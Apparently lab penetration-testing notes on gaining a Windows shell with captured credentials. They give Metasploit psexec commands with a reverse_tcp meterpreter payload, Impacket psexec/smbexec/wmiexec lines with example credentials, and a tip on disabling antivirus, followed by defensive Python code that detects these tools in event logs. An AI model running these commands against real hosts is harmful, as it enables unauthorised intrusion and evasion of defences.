Gaining Shell Access

  • Once we have used the hashes from SMB Relay or LLMNR Poisoning, we should have some creds we can use to gain shell access

  • Spin up metasploit

# Start metasploit 
msfconsole

# Search for the psexec module 
search psexec 

# Look for windows/smb/psexec and select it
use exploit/windows/smb/psexec

# Set options 
set rhosts TARGET_IP
set smbdomain TARGET_DOMAIN
set smbpass USER_PASS
set smbuser TARGET_USER
set payload windows/x64/meterpreter/reverse_tcp
set lhost YOUR_IP

# Launch the module 
run

  • Another option is to use psexec.py

# Run psexec.py 
psexec.py TARGET_DOMAIN/TARGET_USER:USER_PASS@TARGET_IP

# Example 
psexec.py marvel.local/fcastle:Password1@10.0.2.4

  • Other options

    • These are useful for moving around quietly, gathering information, disabling things like AV, etc.

smbexec.py TARGET_DOMAIN/TARGET_USER:USER_PASS@TARGET_IP

wmiexec.py TARGET_DOMAIN/TARGET_USER:USER_PASS@TARGET_IP
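From the defender's side, each of these tools leaves a recognisable footprint in Windows event logs. As an added example (not part of the original notes), the Python routine below triages constructed event records for those footprints: a 7045 service-installation event naming the Sysinternals PSEXESVC service or an ImagePath that runs %COMSPEC% and writes output to a loopback share (smbexec-style), and a 4688 process-creation event spawned by WmiPrvSE.exe that redirects output to \\127.0.0.1\ADMIN$ (wmiexec-style). The sample events, service names and timestamps are constructed, modelled on the tools' default behaviour.

```python
"""Heuristic triage of Windows event records for psexec/smbexec/wmiexec-style
remote-execution artifacts. Added example; the events below are constructed."""
import re

# Constructed sample events modelled on what these tools typically leave behind.
SAMPLE_EVENTS = [
    # Sysinternals PsExec installs its helper service under a fixed name.
    {"id": 7045, "service": "PSEXESVC", "image": r"%SystemRoot%\PSEXESVC.exe"},
    # smbexec-style: service ImagePath is a cmd one-liner writing to a loopback share.
    {"id": 7045, "service": "BTOBTO",
     "image": r"%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat"},
    # wmiexec-style: WMI provider host spawns cmd.exe with output redirected to ADMIN$.
    {"id": 4688, "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.12 2>&1"},
    # Benign control: a normal service installation.
    {"id": 7045, "service": "Spooler", "image": r"C:\Windows\System32\spoolsv.exe"},
]

# UNC path to the host's own ADMIN$ or C$ share via loopback.
LOOPBACK_SHARE = re.compile(r"\\\\127\.0\.0\.1\\(ADMIN|C)\$", re.IGNORECASE)


def triage(event):
    """Return a label for the suspected technique, or None if nothing matched."""
    if event["id"] == 7045:  # System log: a service was installed
        svc, image = event.get("service", ""), event.get("image", "")
        if svc.upper() == "PSEXESVC":
            return "psexec: Sysinternals PSEXESVC service installed"
        if "%COMSPEC%" in image.upper() or LOOPBACK_SHARE.search(image):
            return "smbexec-style: service runs a shell writing output to a loopback share"
    if event["id"] == 4688:  # Security log: a new process was created
        parent, cmd = event.get("parent", ""), event.get("cmdline", "")
        if parent.lower().endswith("wmiprvse.exe") and LOOPBACK_SHARE.search(cmd):
            return "wmiexec-style: WMI-spawned shell redirecting output to a loopback share"
    return None


def triage_all(events):
    """Pair every event id with its triage verdict (None means no match)."""
    return [(e["id"], triage(e)) for e in events]


if __name__ == "__main__":
    for eid, verdict in triage_all(SAMPLE_EVENTS):
        print(eid, verdict or "no match")
```

Metasploit's psexec module and Impacket's psexec.py use randomised service names instead of PSEXESVC, so for those the 7045 event itself (a new service whose binary was just written to ADMIN$) is the signal rather than the name.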
